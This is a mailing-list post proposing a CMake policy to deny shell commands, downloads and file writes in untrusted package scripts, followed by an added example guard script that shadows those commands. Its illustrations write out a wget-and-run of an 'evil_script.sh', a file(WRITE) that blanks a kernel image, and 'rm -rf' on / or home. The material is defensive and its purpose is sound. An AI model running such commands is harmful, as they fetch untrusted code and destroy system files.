Hi,

I'm working on a package manager based on cmake.
And some cmake instructions are downloaded with user packages.
I'd like to have the ability to deny some cmake features in such
external untrusted insertions.
1. Disable any COMMAND invocations (in exec[ute]_command,
add_custom_command, add_custom_target etc.)
2. Disable any external_project downloads etc.
3. Disable specific cmake commands (e.g. file(WRITE ...))
4. add more potentially insecure features here

Potential vulnerabilities are (according to previous list):
1. Invocation of 'rm -rf' command. The dir can be / in sudo or ~ in user mode.
2. Downloading of unwanted scripts. Also applicable to 1).
3. Rewriting important system files (like /boot/kernel.image...,
/lib/libc... etc)

How can it be done?
1. Set a new policy?
2,3. Add new cmake command: enable_command(cmd, {On|Off})

Example:
...
# trusted code above

set_policy(disable COMMAND) # pseudo
enable_command(file, Off)

# untrusted ON

execute_command(
  COMMAND wget http://.../evil_script.sh
  COMMAND ./evil_script.sh
) # will throw an error - COMMAND is denied

file(WRITE /boot/vmlinuz-4.4.0-34-generic "") # will throw an error - file is banned

# untrusted OFF

enable_command(file, On)
set_policy(enable COMMAND) # pseudo
# trusted code below
...

What do you think?
Is it possible in the latest CMake? Or can it be added in the future?

-- 
Egor Pugin
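An approximation of the proposed deny list that works in current CMake, added here as an example (it is not part of the post and not CMake's own feature): the untrusted script is run in a throw-away `cmake -P` process in which the denied built-in commands are shadowed by functions that abort the run. The script name deny_guard.cmake and the variable UNTRUSTED_SCRIPT are assumptions of this example. Shadowing guards against accidents, not against a hostile script, because an included script can redefine commands itself; that is the gap the proposed policy would close.

```cmake
# deny_guard.cmake (added example, not part of the post or of CMake itself).
# Runs an untrusted script under a deny list by shadowing built-in commands
# in a throw-away CMake process:
#   cmake -DUNTRUSTED_SCRIPT=/path/to/untrusted.cmake -P deny_guard.cmake
cmake_minimum_required(VERSION 3.0)

if(NOT DEFINED UNTRUSTED_SCRIPT)
  message(FATAL_ERROR "usage: cmake -DUNTRUSTED_SCRIPT=<path> -P deny_guard.cmake")
endif()

# A function whose name matches a built-in command replaces that command for
# the rest of the process; CMake keeps the previous definition reachable
# under the same name with a leading underscore (here: _file).

function(execute_process)
  message(FATAL_ERROR "execute_process() is denied in ${UNTRUSTED_SCRIPT}")
endfunction()

function(add_custom_command)
  message(FATAL_ERROR "add_custom_command() is denied in ${UNTRUSTED_SCRIPT}")
endfunction()

function(add_custom_target)
  message(FATAL_ERROR "add_custom_target() is denied in ${UNTRUSTED_SCRIPT}")
endfunction()

# file(): allow the read-only subcommands, deny everything else (WRITE,
# APPEND, REMOVE, DOWNLOAD, ...). Arguments are forwarded as a plain list,
# which is adequate for the two subcommands allowed here.
function(file subcommand)
  if(subcommand STREQUAL "READ" OR subcommand STREQUAL "STRINGS")
    # file(READ|STRINGS <filename> <variable> ...): run the original command,
    # then hand the result variable (ARGV2) back to the caller's scope.
    _file(${ARGV})
    set(${ARGV2} "${${ARGV2}}" PARENT_SCOPE)
  else()
    message(FATAL_ERROR "file(${subcommand}) is denied in ${UNTRUSTED_SCRIPT}")
  endif()
endfunction()

# Everything from here on runs under the deny list.
include("${UNTRUSTED_SCRIPT}")
```

Because the guard runs in its own process, nothing has to be re-enabled afterwards; the trusted configure step simply never loads the untrusted file itself.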